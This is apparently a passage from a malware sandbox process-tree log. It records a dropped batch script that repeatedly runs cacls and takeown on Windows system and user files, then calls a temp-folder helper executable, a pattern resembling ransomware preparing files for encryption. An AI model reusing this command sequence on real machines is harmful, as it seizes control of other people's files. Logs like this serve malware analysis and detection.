C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:3504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1132
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:2744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:5060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:4828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3728
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵PID:1808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:3328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl""2⤵PID:1544
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" /E /G Admin:F /C3⤵PID:3832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl"3⤵
- Modifies file permissions
PID:5000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner3⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" -nobanner4⤵PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl""2⤵PID:5092
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl"3⤵PID:3068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner3⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner4⤵PID:676
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl""2⤵PID:2332
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" /E /G Admin:F /C3⤵PID:4852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl"3⤵
- Modifies file permissions
PID:3744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner3⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.1fc87425-c5fb-454c-8d3a-131a11dfac63.1.etl" -nobanner4⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:3104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:4228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:3976
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl"3⤵
- Modifies file permissions
PID:4716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner3⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.5e2fe5c7-5b22-43a2-b74d-97686fd70486.1.etl" -nobanner4⤵PID:3904
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:3524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:2980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "settings.dat" -nobanner3⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "settings.dat" -nobanner4⤵PID:4088
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:3784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:2116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "device.png" -nobanner3⤵PID:1340
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "device.png" -nobanner4⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:4896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "background.png" -nobanner3⤵PID:4760
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "background.png" -nobanner4⤵PID:4320
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl""2⤵PID:476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" /E /G Admin:F /C3⤵PID:4876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl"3⤵
- Modifies file permissions
PID:4952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner4⤵PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:2640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵PID:4364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5000
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:2088
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:4800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:1156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:3068
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:2272
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:2624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:3160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "overlay.png" -nobanner3⤵PID:3276
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "overlay.png" -nobanner4⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:4164
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:1212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:4228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "settings.dat" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "settings.dat" -nobanner4⤵PID:4168
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl""2⤵PID:3464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl"3⤵PID:4788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner3⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "WuProvider.921df37c-b309-4109-8c4a-2cd21962ab35.1.etl" -nobanner4⤵PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl""2⤵PID:4756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl"3⤵
- Modifies file permissions
PID:4720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner3⤵PID:824
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner4⤵PID:3524
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:1864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:4940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:4516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "watermark.png" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "watermark.png" -nobanner4⤵PID:5008
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:3812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:3768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:4760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:2204
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl"3⤵
- Modifies file permissions
PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner3⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "UpdateSessionOrchestration.e2f832ce-4b0e-4e72-befe-61d8bcc2c7ec.1.etl" -nobanner4⤵PID:1192
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:4900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:4308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵PID:4296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:3780
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl""2⤵PID:620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl"3⤵
- Modifies file permissions
PID:2288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner3⤵PID:3644
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "NotificationUxBroker.cd09c61e-9532-450b-b7b3-7b652f7242c0.1.etl" -nobanner4⤵PID:4796
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:4464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:3568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵PID:412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:3656
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:2584
-
-
-
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exehbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl""2⤵PID:4640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl" /E /G Admin:F /C3⤵PID:4672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.7a2de38e-949f-499d-a7e9-32fec9ad3dcd.1.etl"3⤵PID:1220
-
-
